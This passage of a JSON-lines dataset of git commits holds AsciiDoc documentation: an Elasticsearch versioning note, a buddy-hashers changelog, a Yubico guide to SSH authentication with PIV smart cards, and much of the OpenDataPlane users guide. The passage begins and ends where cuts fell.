`external_gt`:: Only index the document if the given version is strictly higher\nthan the version of the stored document *or* if there is no existing document. The given\nversion will be used as the new version and will be stored with the new document. 
The supplied\nversion must be a non-negative long number.\n\n`external_gte`:: Only index the document if the given version is *equal* or higher\nthan the version of the stored document. If there is no existing document\nthe operation will succeed as well. The given version will be used as the new version\nand will be stored with the new document. The supplied version must be a non-negative long number.\n\n*NOTE*: The `external_gte` version type is meant for special use cases and\nshould be used with care. If used incorrectly, it can result in loss of data.\nThere is another option, `force`, which is deprecated because it can cause\nprimary and replica shards to diverge.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbe8915cf8d7c3f258cff92ae459eed43a7f973e","subject":"Update changelog.","message":"Update changelog.\n","repos":"funcool\/buddy-hashers,rorygibson\/buddy-hashers,rorygibson\/buddy-hashers,funcool\/buddy-hashers","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"= Changelog\n\n== Version 0.6.0\n\nDate: 2015-06-28\n\n- Update to buddy-core 0.6.0\n\n\n== Version 0.5.0\n\nDate: 2015-06-15\n\n- `check` function is now null pointer safe.\n\n\n== Version 0.4.2\n\nDate: 2015-04-03\n\n- Update buddy-core to 0.5.0\n\n\n== Version 0.4.1\n\nDate: 2015-03-14\n\n- Update buddy-core from 0.4.0 to 0.4.2\n\n\n== Version 0.4.0\n\nDate: 2015-02-22\n\n- Update buddy-core dependency version to 0.4.0\n- Adapt the code to buddy-core 0.4.0\n\n\n== Version 0.3.0\n\nDate: 2015-01-18\n\n- First version splitted from monolitic buddy package.\n- Add complete refactored version of hashers, more flexible and extensible.\n- Add support for pbkdf2+sha256 and pbkdf2+sha3_256 password hasher algorithms.\n- Maintain the old namespace for backward compatibility.","old_contents":"= Changelog\n\n== Version 0.5.0\n\nDate: 2015-06-15\n\n- `check` function is now null pointer safe.\n\n\n== Version 0.4.2\n\nDate: 2015-04-03\n\n- Update buddy-core to 0.5.0\n\n\n== Version 0.4.1\n\nDate: 2015-03-14\n\n- Update buddy-core from 0.4.0 to 0.4.2\n\n\n== Version 0.4.0\n\nDate: 2015-02-22\n\n- Update buddy-core dependency version to 0.4.0\n- Adapt the code to buddy-core 0.4.0\n\n\n== Version 0.3.0\n\nDate: 2015-01-18\n\n- First version splitted from monolitic buddy package.\n- Add complete refactored version of hashers, more flexible and extensible.\n- Add support for pbkdf2+sha256 and pbkdf2+sha3_256 password hasher algorithms.\n- Maintain the old namespace for backward compatibility.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c73237b85b1d01a183a41af2aed56221db47f509","subject":"Update 2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","message":"Update 2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"ae63ca7ce854c0e03cf30a74d191b01ea63529cd","subject":"Fix AsciiDoc issue","message":"Fix AsciiDoc 
issue\n","repos":"akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/SSH_with_PIV_and_PKCS11.adoc","new_file":"doc\/SSH_with_PIV_and_PKCS11.adoc","new_contents":"Using PIV for SSH through PKCS11\n--------------------------------\n\nThis is a step-by-step for how to get a YubiKey with PIV to work for\npublic-key authentication with OpenSSH through PKCS11.\nPrimarily on a OS X or Linux system.\n\nPrerequisites\n-------------\n\n* a YubiKey with the PIV application loaded\n* the yubico-piv-tool software\n* the OpenSC software\n* OpenSSH\n** If you are using OSX El Capitan (10.11) or earlier, for ssh-agent to work a newer OpenSSH than is delivered with the system; macOS Sierra (10.12) contains a compatible version\n\n[NOTE]\nThe following example assume that you have not yet changed the management key. If you have changed the management key, add `--key` to the `yubico-piv-tool -a import-certificate` command below.\n\n\nSteps\n-----\n\n1. Generate a key in slot 9a (any slot should suffice):\n\n $ yubico-piv-tool -s 9a -a generate -o public.pem\n+\n[NOTE]\nRSA 4096-bit keys are not currently supported due to a limitation in the PIV spec: https:\/\/github.com\/Yubico\/yubico-piv-tool\/issues\/58\n\n2. Create a self-signed certificate for that key.\nThe only use for the X.509 certificate is to make PIV\/PKCS#11 lib happy.\nThey would want to be able to extract the public-key from the smartcard,\nand do that through the X.509 certificate.\n\n $ yubico-piv-tool -a verify-pin -a selfsign-certificate -s 9a -S \"\/CN=SSH key\/\" -i public.pem -o cert.pem\n\n3. Load the certificate:\n\n $ yubico-piv-tool -a import-certificate -s 9a -i cert.pem\n\n4. Find out where OpenSC has installed the pkcs11 module.\n\n * For OS X with binary installation this is typically in `\/Library\/OpenSC\/lib\/`. Homebrew users can use `export OPENSC_LIBS=$(brew --prefix opensc)\/lib`.\n\n * For a Debian based system this is typically in `\/usr\/lib\/x86_64-linux-gnu\/`\n+\nAfter this we'll call this location `$OPENSC_LIBS`\n\n5. Export the public key in correct format for ssh and once you got it,\nadd it to authorized_keys on the target system.\n\n $ ssh-keygen -D $OPENSC_LIBS\/opensc-pkcs11.so -e\n+\n[NOTE]\nThe command will export all keys stored on the YubiKey Neo.\nHopefully it will keep the slot order so it should be not hard to guess which\nis the public key associated with your targeted private key.\n\n6. Authenticate to the target system using the new key:\n\n $ ssh -I $OPENSC_LIBS\/opensc-pkcs11.so user@remote.example.com\n\n7. 
This can also be setup to work with ssh-agent: (Optional)\n\n $ ssh-add -s $OPENSC_LIBS\/opensc-pkcs11.so\n+\nNOTE: On OS X prior to macOS 10.12 \u201cSierra\u201d this typically requires installation of a third-party OpenSSH from Homebrew or the like and using that ssh-agent.\n+\nTo confirm that the ssh-agent correctly finds that key and getting the public key in correct format:\n\n $ ssh-add -L\n","old_contents":"Using PIV for SSH through PKCS11\n--------------------------------\n\nThis is a step-by-step for how to get a YubiKey with PIV to work for\npublic-key authentication with OpenSSH through PKCS11.\nPrimarily on a OS X or Linux system.\n\nPrerequisites\n-------------\n\n* a YubiKey with the PIV application loaded\n* the yubico-piv-tool software\n* the OpenSC software\n* OpenSSH\n** If you are using OSX El Capitan (10.11) or earlier, for ssh-agent to work a newer OpenSSH than is delivered with the system; macOS Sierra (10.12) contains a compatible version\n\n[NOTE]\nThe following example assume that you have not yet changed the management key. If you have changed the management key, add `--key` to the `yubico-piv-tool -a import-certificate` command below.\n\n\nSteps\n-----\n\n1. Generate a key in slot 9a (any slot should suffice):\n\n $ yubico-piv-tool -s 9a -a generate -o public.pem\n\n[NOTE]\nRSA 4096-bit keys are not currently supported due to a limitation in the PIV spec: https:\/\/github.com\/Yubico\/yubico-piv-tool\/issues\/58\n\n2. Create a self-signed certificate for that key.\nThe only use for the X.509 certificate is to make PIV\/PKCS#11 lib happy.\nThey would want to be able to extract the public-key from the smartcard,\nand do that through the X.509 certificate.\n\n $ yubico-piv-tool -a verify-pin -a selfsign-certificate -s 9a -S \"\/CN=SSH key\/\" -i public.pem -o cert.pem\n\n3. Load the certificate:\n\n $ yubico-piv-tool -a import-certificate -s 9a -i cert.pem\n\n4. Find out where OpenSC has installed the pkcs11 module.\n\n * For OS X with binary installation this is typically in `\/Library\/OpenSC\/lib\/`. Homebrew users can use `export OPENSC_LIBS=$(brew --prefix opensc)\/lib`.\n\n * For a Debian based system this is typically in `\/usr\/lib\/x86_64-linux-gnu\/`\n+\nAfter this we'll call this location `$OPENSC_LIBS`\n\n5. Export the public key in correct format for ssh and once you got it,\nadd it to authorized_keys on the target system.\n\n $ ssh-keygen -D $OPENSC_LIBS\/opensc-pkcs11.so -e\n+\n[NOTE]\nThe command will export all keys stored on the YubiKey Neo.\nHopefully it will keep the slot order so it should be not hard to guess which\nis the public key associated with your targeted private key.\n\n6. Authenticate to the target system using the new key:\n\n $ ssh -I $OPENSC_LIBS\/opensc-pkcs11.so user@remote.example.com\n\n7. 
This can also be setup to work with ssh-agent: (Optional)\n\n $ ssh-add -s $OPENSC_LIBS\/opensc-pkcs11.so\n+\nNOTE: On OS X prior to macOS 10.12 \u201cSierra\u201d this typically requires installation of a third-party OpenSSH from Homebrew or the like and using that ssh-agent.\n+\nTo confirm that the ssh-agent correctly finds that key and getting the public key in correct format:\n\n $ ssh-add -L\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"cd636972a8c8f4f467354c96962cf5fc31a3e4de","subject":"documentation: userguide: add packet processing description","message":"documentation: userguide: add packet processing description\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Petri Savolainen <d528fd253b9aaf78fa72edbcc6249e82047f6ce6@nokia.com>\nReviewed-by Mike Holmes <mike.holmes@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,nmorey\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::..\/images\/overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::..\/images\/odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP. To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. 
Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently.\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG).\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform.\n* Distribution and maintenance of each implementation is as the owner wishes:\n - Open source or closed source as business needs determine\n - Independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary reference implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*.\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. 
In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms.\n* Implementers are free to borrow or tailor code as needed for their platform.\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with the ODP API specification.\n* Maintained and distributed by LNG.\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations.\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) whose levels are incremented according to the\ndegree of change they represent. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto the specified syntax or functional behavior of APIs, and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three-level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. 
The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform-specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from its implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many-core architectures. This is done using an event-based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a\nhigh-level overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, which are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a\nrun-to-completion model. 
Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many-core processing environments;\nhowever, a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower-performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what the event represents. Threads can create new\nevents, consume events processed by them, or perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n
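As a minimal sketch of that casting pattern (the dispatch helpers +process_packet()+ and +process_timeout()+ are hypothetical application functions, not ODP APIs):\n\n.Dispatching on event type (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic void process_packet(odp_packet_t pkt);   \/* hypothetical application code *\/\nstatic void process_timeout(odp_timeout_t tmo); \/* hypothetical application code *\/\n\nstatic void handle_event(odp_event_t ev)\n{\n    \/* Query the event type, then cast to the type-specific handle *\/\n    switch (odp_event_type(ev)) {\n    case ODP_EVENT_PACKET:\n        process_packet(odp_packet_from_event(ev));\n        break;\n    case ODP_EVENT_TIMEOUT:\n        process_timeout(odp_timeout_from_event(ev));\n        break;\n    default:\n        odp_event_free(ev);\n        break;\n    }\n}\n----\n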
=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed-sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system-maintained\nmetadata that provides information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information. Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read-only and thus\nno setter is provided to manipulate it. When objects have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of system metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIe or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track the time flow of an\napplication, and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: the local time API and the global\ntime API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads as\ntime consistency is not guaranteed, but in many cases a thread-local view of\ntime is all that is needed. Local time stamps are therefore local to the\ncalling thread and must not be shared with other threads. The current local\ntime can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads,\nso global time stamps can be shared between threads. The current global time\ncan be read with +odp_time_global()+.\n\nNeither local nor global time wraps during the application's life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, and +odp_time_cmp()+, and conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, and +odp_time_global_from_ns()+.\nTo get the rate of the time source, +odp_time_local_res()+ and\n+odp_time_global_res()+ are used. To wait, +odp_time_wait_ns()+ and\n+odp_time_wait_until()+ are used, during which a thread may busy-loop for the\nentire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n
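To make the interval-measurement pattern concrete, here is a minimal sketch using the functions named above (+do_work()+ is a hypothetical application function):\n\n.Measuring a local time interval (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic void do_work(void); \/* hypothetical application code *\/\n\nstatic uint64_t measure_work_ns(void)\n{\n    \/* Local time stamps stay on the calling thread *\/\n    odp_time_t start = odp_time_local();\n\n    do_work();\n\n    \/* Difference converted to nanoseconds *\/\n    return odp_time_to_ns(odp_time_diff(odp_time_local(), start));\n}\n----\n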
=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner. ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::..\/images\/odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding) others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a flow:\n\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n
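As an illustrative sketch of how a CoS might be set up programmatically--assuming the +odp_cls_cos_param_init()+\/+odp_cls_cos_create()+ form of the classification API, whose exact names and fields may differ between ODP API levels--where +pkt_pool+ and +flow_queue+ were created earlier by the application:\n\n.Creating a Class of Service (sketch)\n[source,c]\n----\n#include <odp.h>\n\nstatic odp_cos_t make_cos(odp_pool_t pkt_pool, odp_queue_t flow_queue)\n{\n    odp_cls_cos_param_t cos_param;\n\n    odp_cls_cos_param_init(&cos_param);\n    cos_param.pool  = pkt_pool;   \/* pool that packets of this CoS are stored in *\/\n    cos_param.queue = flow_queue; \/* queue that packets of this CoS are added to *\/\n\n    return odp_cls_cos_create(\"flow-a\", &cos_param);\n}\n----\n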
=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::..\/images\/odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped for processing into classes and\nhave threads that are dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously. When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::..\/images\/odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is transmission. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The Doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per-platform\ndirectories. 
Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the +#define+ is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 odp\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 api\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502\u00a0\u00a0 \u2502\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown;\ncalling the terminate functions should only be done when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform-specific data that is not yet, or may never be,\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()'. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is 